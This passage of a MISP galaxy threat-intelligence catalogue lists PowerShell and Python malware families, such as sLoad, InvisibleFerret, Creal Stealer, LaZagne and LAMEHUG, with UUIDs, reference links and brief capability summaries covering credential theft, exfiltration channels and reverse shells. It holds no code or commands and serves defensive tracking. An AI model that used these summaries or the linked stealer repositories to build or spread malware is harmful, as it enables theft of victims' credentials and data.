control infected systems.
Internal MISP references
UUID a4742e21-b4ad-4dc3-8207-5e6990cd33a5 which can be used as unique global reference for SilentPrism in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
skyrat
Internal MISP references
UUID 8e5d7d24-9cdd-4376-a6c7-967273dfeeab which can be used as unique global reference for skyrat in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
sLoad
sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted banks), as well as load external binaries.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular sLoad.
| Known Synonyms |
|---|
| Starslord |
Internal MISP references
UUID e78c0259-9299-4e55-b934-17c6a3ac4bc2 which can be used as unique global reference for sLoad in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload - webarchive
- https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9 - webarchive
- https://www.microsoft.com/security/blog/2020/01/21/sload-launches-version-2-0-starslord/ - webarchive
- https://www.certego.net/en/news/sload-hits-italy-unveil-the-power-of-powershell-as-a-downloader/ - webarchive
- https://www.cert-pa.it/notizie/campagna-sload-star-wars-edition-veicolata-via-pec/ - webarchive
- https://threatpost.com/sload-spying-payload-delivery-bits/151120/ - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf - webarchive
- https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy - webarchive
- https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/ - webarchive
- https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan - webarchive
- https://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/ - webarchive
- https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html - webarchive
- https://www.intrinsec.com/wp-content/uploads/2025/03/TLP-CLEAR-From-espionage-to-PsyOps-Tracking-operations-and-infrastructure-of-UACs-in-2025-EN-1.pdf - webarchive
- https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/ - webarchive
- https://blog.minerva-labs.com/sload-targeting-europe-again - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Snugy
Internal MISP references
UUID 773a6520-d164-4727-8351-c4201b04f10b which can be used as unique global reference for Snugy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
STEELHOOK
Internal MISP references
UUID f963e3df-13d1-4fd0-abdd-792c0d05e41c which can be used as unique global reference for STEELHOOK in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.steelhook - webarchive
- https://github.com/blackorbird/APT_REPORT/blob/master/APT28/APT28%20the%20long%20hand%20of%20Russian%20interests.pdf - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2025-CTI-007.pdf - webarchive
- https://media.defense.gov/2025/May/21/2003719846/-1/-1/0/CSA_RUSSIAN_GRU_TARGET_LOGISTICS.PDF - webarchive
- https://cert.gov.ua/article/6276894 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SUBTLE-PAWS
Internal MISP references
UUID 399258d3-6919-45f9-a557-10c3cbef9bd4 which can be used as unique global reference for SUBTLE-PAWS in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Swrort Stager
Internal MISP references
UUID 3347a1bc-6b4d-459c-98a5-746bab12d011 which can be used as unique global reference for Swrort Stager in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Tater PrivEsc
Internal MISP references
UUID 808445e6-f51c-4b5d-a812-78102bf60d24 which can be used as unique global reference for Tater PrivEsc in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ThunderShell
Internal MISP references
UUID fd9904a6-6e06-4b50-8bfd-64ffb793d4a4 which can be used as unique global reference for ThunderShell in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified PS 001
Recon and exfiltration script, dropped from a LNK file. Attributed to APT-C-12.
Internal MISP references
UUID 77231587-0dbe-4064-97b5-d7f4a2e3dc67 which can be used as unique global reference for Unidentified PS 001 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified PS 002 (RAT)
A Powershell-based RAT capable of pulling further payloads, delivered through Russia-themed phishing mails.
Internal MISP references
UUID 73578ff6-b218-4271-9bda-2a567ba3e259 which can be used as unique global reference for Unidentified PS 002 (RAT) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.unidentified_002 - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/ - webarchive
- https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified PS 003 (RAT)
This malware is a RAT written in PowerShell. It has the following capabilities: downloading and uploading files, loading and executing a PowerShell script, and executing a specific command. It was observed by the Malwarebytes Labs Threat Intelligence Team in a newly discovered campaign that, according to Malwarebytes Labs, tries to lure Germans with a promise of updates on the current threat situation in Ukraine.
Internal MISP references
UUID 709ba4ad-9ec5-4e0b-b642-96db3b7f6898 which can be used as unique global reference for Unidentified PS 003 (RAT) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified PS 004 (RAT)
Internal MISP references
UUID a8f69576-676f-4536-b301-246ddd87ceeb which can be used as unique global reference for Unidentified PS 004 (RAT) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified PS 005 (Telegram Bot)
Internal MISP references
UUID 43e09f73-5095-40dd-a10f-5bea20d9210e which can be used as unique global reference for Unidentified PS 005 (Telegram Bot) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ViperSoftX
Internal MISP references
UUID 15b551ea-b59a-40f9-a10f-6144415d2d5c which can be used as unique global reference for ViperSoftX in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.vipersoftx - webarchive
- https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/ - webarchive
- https://www.trendmicro.com/en_us/research/23/d/vipersoftx-updates-encryption-steals-data.html - webarchive
- https://chris.partridge.tech/2022/evolution-of-vipersoftx-dga - webarchive
- https://labs.k7computing.com/index.php/in-depth-analysis-of-a-2025-vipersoftx-variant - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
WannaMine
Internal MISP references
UUID beb4f2b3-85d1-491d-8ae1-f7933f00f820 which can be used as unique global reference for WannaMine in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannamine - webarchive
- https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/ - webarchive
- https://news.sophos.com/fr-fr/2020/01/22/wannamine-meme-cybercriminels-veulent-avoir-mot-a-dire-sur-brexit/ - webarchive
- https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry - webarchive
- https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/ - webarchive
- https://www.accenture.com/_acnmedia/PDF-46/Accenture-Threat-Analysis-Monero-Wannamine.pdf - webarchive
- https://nakedsecurity.sophos.com/2018/01/31/what-are-wannamine-attacks-and-how-do-i-avoid-them/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
WannaRen Downloader
Internal MISP references
UUID c9ef106e-def9-4229-8373-616a298ed645 which can be used as unique global reference for WannaRen Downloader in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
WMImplant
Internal MISP references
UUID d1150a1a-a2f4-4954-b22a-a85b7876408e which can be used as unique global reference for WMImplant in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
WRECKSTEEL
According to CERT-UA, this is a stealer targeting a range of file extensions and taking screenshots of the compromised machine, which are then uploaded via cURL.
Internal MISP references
UUID 3adf4cb9-d85a-48b3-80dc-9935947676e4 which can be used as unique global reference for WRECKSTEEL in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wrecksteel - webarchive
- https://socprime.com/blog/detect-uac-0219-attacks-against-ukrainian-state-bodies - webarchive
- https://socprime.com/blog/detect-uac-0219-attacks-against-ukrainian-state-bodies/ - webarchive
- https://cip.gov.ua/services/cm/api/attachment/download?id=71278 - webarchive
- https://cert.gov.ua/article/6282902 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Akira Stealer
Internal MISP references
UUID 53561b34-6062-4f8b-aa47-787198ba9bff which can be used as unique global reference for Akira Stealer in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AndroxGh0st
According to Lacework, this is an SMTP cracker, primarily intended to scan for and parse Laravel application secrets from exposed .env files. Note: Laravel is an open source PHP framework, and the Laravel .env file is often targeted for its various configuration data, including AWS, SendGrid and Twilio credentials. AndroxGh0st has multiple features to enable SMTP abuse, including scanning, exploitation of exposed credentials and APIs, and even deployment of webshells. For AWS specifically, the malware scans for and parses AWS keys but also has the ability to generate keys for brute force attacks. However, the brute force capability is likely a novelty and is a statistically unlikely attack vector.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AndroxGh0st.
| Known Synonyms |
|---|
| Androx |
| AndroxGhost |
Internal MISP references
UUID e8f24c9c-c03c-4740-a121-d73789931c8e which can be used as unique global reference for AndroxGh0st in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.androxgh0st - webarchive
- https://web.archive.org/web/20240715165609/https://www.lacework.com/blog/androxghost-the-python-malware-exploiting-your-aws-keys - webarchive
- https://www.lacework.com/blog/androxghost-the-python-malware-exploiting-your-aws-keys/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Anubis Backdoor
According to Prodaft, this is a Python-based backdoor used by the Savage Ladybug (FIN7) group, developed to provide remote access, execute commands, and steal data. It is obfuscated to avoid detection.
Internal MISP references
UUID 6bb40ba1-71a9-4f02-9bc7-94ce542ec8e5 which can be used as unique global reference for Anubis Backdoor in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Archivist
Internal MISP references
UUID 2095a09c-3fdd-4164-b82e-2e9a41affd8e which can be used as unique global reference for Archivist in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Ares (Python)
Ares is a Python RAT.
Internal MISP references
UUID c4a578de-bebe-49bf-8af1-407857acca95 which can be used as unique global reference for Ares (Python) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BlankGrabber
Stealer written in Python 3, typically distributed bundled via PyInstaller.
Internal MISP references
UUID c41d4749-b713-4f4c-b718-4076c0479ebc which can be used as unique global reference for BlankGrabber in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.blankgrabber - webarchive
- https://c-b.io/2025-02-15+-+Dissecting+a+fresh+BlankGrabber+sample - webarchive
- https://www.linkedin.com/feed/update/urn
activity:7247179869443264512/ - webarchive
- https://github.com/Blank-c/Blank-Grabber - webarchive
- https://labs.k7computing.com/index.php/open-source-stealers-oss-python/ - webarchive
- https://c-b.io/blog/dissecting_blankgrabber/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Braodo
According to K7 Security Labs, Braodo Stealer is written in Python and collects all cookies and saved credentials from the browsers, together with the service and process information of the particular system, into a zip file, which is then exfiltrated to a Telegram channel.
Internal MISP references
UUID d39eaab7-773d-41b4-9113-cfd67971ba65 which can be used as unique global reference for Braodo in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BrickerBot
Internal MISP references
UUID f0ff8751-c182-4e9c-a275-81bb03e0cdf5 which can be used as unique global reference for BrickerBot in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot - webarchive
- https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/ - webarchive
- https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A - webarchive
- http://seclists.org/fulldisclosure/2017/Mar/7 - webarchive
- https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/ - webarchive
- https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/ - webarchive
- https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/ - webarchive
- http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CHERRYSPY
According to CERT-UA, this is a PyArmor-protected backdoor capable of executing dynamically downloaded Python code.
Internal MISP references
UUID e219bf34-3326-4ff5-91e7-ee9008d5dee7 which can be used as unique global reference for CHERRYSPY in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.cherryspy - webarchive
- https://www.recordedfuture.com/research/russia-aligned-tag-110-targets-tajikistan-with-macro-enabled - webarchive
- https://cert.gov.ua/article/4697016 - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2025-0522.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Creal Stealer
Creal is an open-source grabber/credential stealer that was originally made by a GitHub user named Ayhuuu, who even advertised a "premium" version on his now-deleted Telegram channel @Crealstealer. On the day of release it was already not FUD (fully undetectable), but its open-source nature made it attractive for threat actors to modify the base malware and even obfuscate it for lower detection ratios. The base project came with a compiler, which used PyInstaller to build native formats such as exe. For C2, Discord webhooks were utilized, which in later versions were protected with a service called https://stealer.to so that they could not be deleted.
It compromises the following data on execution:
- Discord Information
- Browser Data
- Crypto Related Data
- Steam
- Riot Games
- Telegram
- System Information
- Tokens/Secrets
Internal MISP references
UUID 8a7becae-fc06-4ff1-b364-b26dd3d2edd9 which can be used as unique global reference for Creal Stealer in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
DropboxC2C
Internal MISP references
UUID 53dd4a8b-374e-48b6-a7c8-58af0e31f435 which can be used as unique global reference for DropboxC2C in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Empyrean
Discord stealer written in Python with JavaScript-based inject files.
Internal MISP references
UUID b1aa0be3-b725-4135-b0b9-3a895d4ef047 which can be used as unique global reference for Empyrean in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Evil Ant
Ransomware written in Python.
Internal MISP references
UUID 24d570c6-3ed4-4346-a8b1-9fed2ed67a95 which can be used as unique global reference for Evil Ant in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Guard
According to Kaspersky Labs, Guard is a malware developed by threat actor WildPressure. It is written in Python and packaged using PyInstaller, both for Windows and macOS operating systems. Its intrinsics resemble parts of how win.milum operates.
Internal MISP references
UUID ac3382b3-3c18-4b16-8f1b-b371794916ac which can be used as unique global reference for Guard in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
InvisibleFerret
Internal MISP references
UUID 332478a1-146f-406e-9af0-b329e478efff which can be used as unique global reference for InvisibleFerret in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.invisibleferret - webarchive
- https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-apt-activity-report-q4-2024-q1-2025.pdf - webarchive
- https://unit42.paloaltonetworks.com/fake-north-korean-it-worker-activity-cluster/ - webarchive
- https://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/ - webarchive
- https://opensourcemalware.com/blog/contagious-interview-vscode - webarchive
- https://www.bitdefender.com/en-us/blog/labs/lazarus-group-targets-organizations-with-sophisticated-linkedin-recruiting-scam - webarchive
- https://www.trendmicro.com/en_us/research/25/d/russian-infrastructure-north-korean-cybercrime.html - webarchive
- https://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages - webarchive
- https://github.com/ssrdio/PublicIoC/tree/main/CestLaVie - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2025/papers/DeceptiveDevelopment-and-North-Korean-IT-workers-from-primitive-crypto-theft-to-sophisticated-AI-based-deception.pdf - webarchive
- https://www-cdn.anthropic.com/b2a76c6f6992465c09a6f2fce282f6c0cea8c200.pdf - webarchive
- https://www.welivesecurity.com/en/eset-research/deceptivedevelopment-from-primitive-crypto-theft-to-sophisticated-ai-based-deception/ - webarchive
- https://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages - webarchive
- https://any.run/cybersecurity-blog/ottercookie-malware-analysis/ - webarchive
- https://blog.nviso.eu/2025/11/13/contagious-interview-actors-now-utilize-json-storage-services-for-malware-delivery/ - webarchive
- https://socket.dev/blog/north-korean-apt-lazarus-targets-developers-with-malicious-npm-package - webarchive
- https://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263 - webarchive
- https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/ - webarchive
- https://objective-see.org/blog/blog_0x7A.html - webarchive
- https://securityscorecard.com/blog/the-job-offer-that-wasnt-how-we-stopped-an-espionage-plot - webarchive
- https://www.zscaler.com/blogs/security-research/pyongyang-your-payroll-rise-north-korean-remote-workers-west - webarchive
- https://security.macnica.co.jp/blog/2024/10/-contagious-interview.html - webarchive
- https://www.cert.si/tz016/ - webarchive
- https://securitylabs.datadoghq.com/articles/tenacious-pungsan-dprk-threat-actor-contagious-interview/ - webarchive
- https://doi.org/10.48550/arXiv.2505.21725 - webarchive
- https://socket.dev/blog/lazarus-expands-malicious-npm-campaign-11-new-packages-add-malware-loaders-and-bitbucket - webarchive
- https://jp.security.ntt/tech_blog/contagious-interview-ottercookie - webarchive
- https://www.group-ib.com/blog/apt-lazarus-python-scripts/ - webarchive
- https://quetzal.bitso.com/p/interview-with-the-chollima - webarchive
- https://www.welivesecurity.com/en/eset-research/deceptivedevelopment-targets-freelance-developers/ - webarchive
- https://stacklok.com/blog/dependency-hijacking-dissecting-north-koreas-new-wave-of-defi-themed-open-source-attacks-targeting-developers - webarchive
- https://socket.dev/blog/north-korea-contagious-interview-campaign-338-malicious-npm-packages - webarchive
- https://securityscorecard.com/blog/operation-phantom-circuit-north-koreas-global-data-exfiltration-campaign/ - webarchive
- https://www.esentire.com/blog/bored-beavertail-invisibleferret-yacht-club-a-lazarus-lure-pt-2 - webarchive
- https://blog.talosintelligence.com/beavertail-and-ottercookie/ - webarchive
- https://jp.security.ntt/tech_blog/en-waterplum-ottercookie - webarchive
- https://web.archive.org/web/20250206220041/https://stacklok.com/blog/dependency-hijacking-dissecting-north-koreas-new-wave-of-defi-themed-open-source-attacks-targeting-developers - webarchive
- https://www.recordedfuture.com/research/inside-the-scam-north-koreas-it-worker-threat - webarchive
- https://www.silentpush.com/blog/contagious-interview-front-companies/ - webarchive
- https://research.hisolutions.com/2025/04/rolling-in-the-deepweb-lazarus-tsunami/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
KeyPlexer
Internal MISP references
UUID cadf8c9d-7bb0-40ad-8c8c-043b1d4b2e93 which can be used as unique global reference for KeyPlexer in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
LAMEHUG
According to CERT-UA, LAMEHUG uses an LLM (Qwen) to dynamically generate commands to gather basic information about a computer and recursively exfiltrate Office documents from a set of folders, to be uploaded either by SFTP or HTTP POST requests.
Internal MISP references
UUID 033d549c-2429-4837-9b3d-53871a2d8520 which can be used as unique global reference for LAMEHUG in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
LaZagne
The author described LaZagne as an open source project used to retrieve lots of passwords stored on a local computer. It has been developed for the purpose of finding these passwords for the most commonly-used software. It is written in Python and provided as compiled standalone binaries for Linux, Mac, and Windows.
Internal MISP references
UUID c752f295-7f08-4cb0-92d5-a0c562abd08c which can be used as unique global reference for LaZagne in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.lazagne - webarchive
- https://edu.anarcho-copy.org/Against%20Security%20&%20%20Self%20Security/Group-IB%20RedCurl.pdf - webarchive
- https://www.mandiant.com/resources/blog/alphv-ransomware-backup - webarchive
- https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/ - webarchive
- https://github.com/AlessandroZ/LaZagne - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ - webarchive
- https://blog.talosintelligence.com/uat-5918-targets-critical-infra-in-taiwan/ - webarchive
- https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/?utm_source=rss&utm_medium=rss&utm_campaign=apt-group-targeting-governmental-agencies-in-east-asia - webarchive
- https://attack.mitre.org/groups/G0100 - webarchive
- https://www.infinitumit.com.tr/apt-35/ - webarchive
- https://attack.mitre.org/groups/G0100/ - webarchive
- https://fourcore.io/blogs/threat-hunting-browser-credential-stealing - webarchive
- https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Lofy
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lofy.
| Known Synonyms |
|---|
| LofyLife |
Internal MISP references
UUID 10882613-ac61-42da-82c8-c0f4bb2673f8 which can be used as unique global reference for Lofy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Loki RAT
This RAT, written in Python, is an open-source fork of the Ares RAT. It integrates additional modules, such as recording, lockscreen, and locate options. It was used in a customized version by the El Machete APT in an ongoing campaign since 2020. The original code can be found at: https://github.com/TheGeekHT/Loki.Rat/
Internal MISP references
UUID 5e7bb9d4-6633-49f8-8770-9ac1163e6531 which can be used as unique global reference for Loki RAT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.lokirat - webarchive
- https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Sood-Compromising-the-Keys-to-the-Kingdom.pdf - webarchive
- https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/ - webarchive
- https://www.youtube.com/watch?v=6Ljl1Rnl1jM - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Luna Grabber
Internal MISP references
UUID e55b4cc8-3680-4586-82b9-4acf8cd3dc3a which can be used as unique global reference for Luna Grabber in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MASEPIE
Internal MISP references
UUID 9233f6e6-9dd7-4b30-adaa-5baf5359d22a which can be used as unique global reference for MASEPIE in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.masepie - webarchive
- https://cert.gov.ua/article/6276894 - webarchive
- https://github.com/blackorbird/APT_REPORT/blob/master/APT28/APT28%20the%20long%20hand%20of%20Russian%20interests.pdf - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2025-CTI-007.pdf - webarchive
- https://harfanglab.io/en/insidethelab/compromised-routers-infrastructure-target-europe-caucasus/ - webarchive
- https://media.defense.gov/2025/May/21/2003719846/-1/-1/0/CSA_RUSSIAN_GRU_TARGET_LOGISTICS.PDF - webarchive
- https://thehackernews.com/2024/03/apt28-hacker-group-targeting-europe.html?m=1 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
N3Cr0m0rPh
An IRC bot written in (obfuscated) Python code. Distributed in the FreakOut attack campaign, written by the author Freak/Fl0urite, with development potentially dating back as far as 2015.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular N3Cr0m0rPh.
| Known Synonyms |
|---|
| FreakOut |
| Necro |
Internal MISP references
UUID 2351539a-165a-4886-b5fe-f56fdf6b167a which can be used as unique global reference for N3Cr0m0rPh in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph - webarchive
- https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ - webarchive
- https://www.bleepingcomputer.com/news/security/freakout-malware-worms-its-way-into-vulnerable-vmware-servers/ - webarchive
- https://www.lacework.com/blog/the-kek-security-network/ - webarchive
- https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/ - webarchive
- https://twitter.com/xuy1202/status/1393384128456794116 - webarchive
- https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html - webarchive
- https://twitter.com/xuy1202/status/1392089568384454657 - webarchive
- https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/ - webarchive
- https://blogs.juniper.net/en-us/threat-research/necro-python-botnet-goes-after-vulnerable-visualtools-dvr - webarchive
- https://blog.netlab.360.com/necro/ - webarchive
- https://github.com/lacework/lacework-labs/tree/master/keksec - webarchive
- https://www.lacework.com/keksec-tsunami-ryuk/ - webarchive
- https://www.lacework.com/the-kek-security-network/ - webarchive
- https://www.lacework.com/blog/spytech-necro-keksecs-latest-python-malware/ - webarchive
- https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
NetWorm
Internal MISP references
UUID 6c6acd00-cdc2-460d-8edf-003b84875b5d which can be used as unique global reference for NetWorm in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
NightshadeC2 (Python)
According to eSentire, NightshadeC2 demonstrates an extensive capability set, including: reverse shell via Command Prompt/PowerShell; download and execute DLL or EXE; self-deletion; remote control; screen capture; hidden web browsers; keylogging; clipboard content capturing. Certain variants have been found with stealing capabilities that enable the extraction of browser passwords and cookies from victim systems for both Gecko- and Chromium-based browsers.
Internal MISP references
UUID 10a8da24-d40d-4f1e-b173-f78e574e86aa which can be used as unique global reference for NightshadeC2 (Python) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PIRAT
Internal MISP references
UUID bca94d33-e5a1-4bcc-981e-f35fd74a79d1 which can be used as unique global reference for PIRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Poet RAT
Cisco Talos has discovered a Python-based RAT they call Poet RAT. It is dropped from a Word document and delivered including a Python interpreter and required libraries. The name originates from references to Shakespeare. Exfiltration happens through FTP.
Internal MISP references
UUID b07819a9-a2f7-454d-a520-c6424cbf1ed4 which can be used as unique global reference for Poet RAT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.poet_rat - webarchive
- https://blog.talosintelligence.com/2020/10/poetrat-update.html - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
- https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-stibnite/ - webarchive
- https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/ - webarchive
- https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf - webarchive
- https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html - webarchive
- https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html - webarchive
- https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
poweRAT
Internal MISP references
UUID b5cb3d2b-0205-4883-aaff-0d0b7a7f032d which can be used as unique global reference for poweRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
pupy (Python)
Internal MISP references
UUID afcc9bfc-1227-4bb0-a88a-5accdbfd58fa which can be used as unique global reference for pupy (Python) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.pupy - webarchive
